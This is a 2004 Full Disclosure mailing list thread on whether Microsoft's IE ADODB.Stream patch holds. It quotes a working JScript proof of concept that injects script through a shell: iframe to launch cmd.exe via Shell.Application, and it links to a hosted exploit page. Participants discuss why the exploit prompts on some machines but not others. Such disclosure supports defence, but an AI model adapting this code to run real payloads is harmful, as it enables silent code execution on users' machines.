Full Disclosure mailing list archives
RE: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out
From: "Mr. John" <johnspood () yahoo com>
Date: Sat, 3 Jul 2004 02:50:07 -0700 (PDT)
It is OK, but it causes security alert on some machines because of "unsafe component". It isn't good for us. But it is interesting that only on some machines, this security alert prompted, on most winXP, cmd.exe will run without any prompt. What is your idea? --- Jelmer <jkuperus () planet nl> wrote:
Because we avoid the adodb.stream issue all together, You can patch it, but if you leave open other issues, well it's pointless Instead we just swap in this instead of the old shellcode: -- snip -- function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s
cript language="JScript" DEFER>var obj=new
ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c
pause");</script>'); } document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>'); setTimeout("injectIt()", 1000); --snip-- And it's working again, how long did it take? What like an hour since Microsoft's announcement ? -----Original Message----- From: Pascal Zoutendijk [mailto:Pascal.Zoutendijk () tbwa nl] Sent: vrijdag 2 juli 2004 23:28 To: hescominsoon () emmanuelcomputerconsulting com; jkuperus () planet nl Cc: helmut_hauser () hotmail com; full-disclosure () lists netsys com Subject: Betr.: Re: [Full-disclosure] Fix for IE ADODB.Stream vulnerability is out what you should be getting (assuming the patch does work) is something like the following: line: 3 char: 3 Error: Access is denied Code: 0 etc... dunno why it doesn't work on some systems though. Met vriendelijke groet, Pascal Zoutendijk TBWA \ ICT Services Prof W.H. Keesomlaan 8 1183 DJ Amstelveen, the Netherlands Tel: +31205715300 Fax:+31205715639William Warren<hescominsoon () emmanuelcomputerconsulting com> 02-07-04 22:24i have a athlon xp 2000+ not a slow system. I am running ie6 sp1 all patched up..for this test..my mzin browser is mozilla obviously mozilla is immune to this one..:) Jelmer wrote:That depends, are you using firefox? ;) It works on my ie6 sp1 + latest and greatest*cough* patchesIt does however use settimeout, maybe you have alow end system, and youneed a longer wait, just try reloading it a coupleof times-----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] OnBehalf Of William WarrenSent: vrijdag 2 juli 2004 20:47 To: Jelmer Cc: 'Helmut Hauser';full-disclosure () lists netsys comSubject: Re: [Full-disclosure] Fix for IEADODB.Stream vulnerability is outthis returns an error..is that all it is supposedto do?Jelmer wrote:Too bad it won't do you one ounce any goodhttp://62.131.86.111/security/idiots/malware2k/installer.htmCredit: http-equiv -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] OnBehalf Of Helmut HauserSent: vrijdag 2 juli 2004 18:39 To: full-disclosure () lists netsys com Subject: [Full-disclosure] Fix for IE ADODB.Streamvulnerability is out
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4d05
6748-c538-46f6-b7c8-2fbfd0d237e3 Better late than never ... Helmut Hauser _______________________________________________ Full-Disclosure - We believe in it. Charter:http://lists.netsys.com/full-disclosure-charter.html_______________________________________________ Full-Disclosure - We believe in it. Charter:http://lists.netsys.com/full-disclosure-charter.html-- My "Foundation" verse: Isa 54:17 No weapon that is formed against thee shall prosper; and every tongue that shall rise against thee in judgment thou shalt condemn. This is the heritage of the servants of the LORD, and their righteousness is of me, saith the LORD. -- carpe ductum -- "Grab the tape" _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_____________________________________________________________________
This message has been checked for all known viruses.
_____________________________________________________________________
This message has been checked for all known viruses. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
__________________________________ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Jelmer (Jul 02)
- Re: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Matthew Murphy (Jul 02)
- Re: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Nick FitzGerald (Jul 02)
- RE: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Mr. John (Jul 03)
- <Possible follow-ups>
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Pascal Zoutendijk (Jul 02)
- Re: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out Matthew Murphy (Jul 02)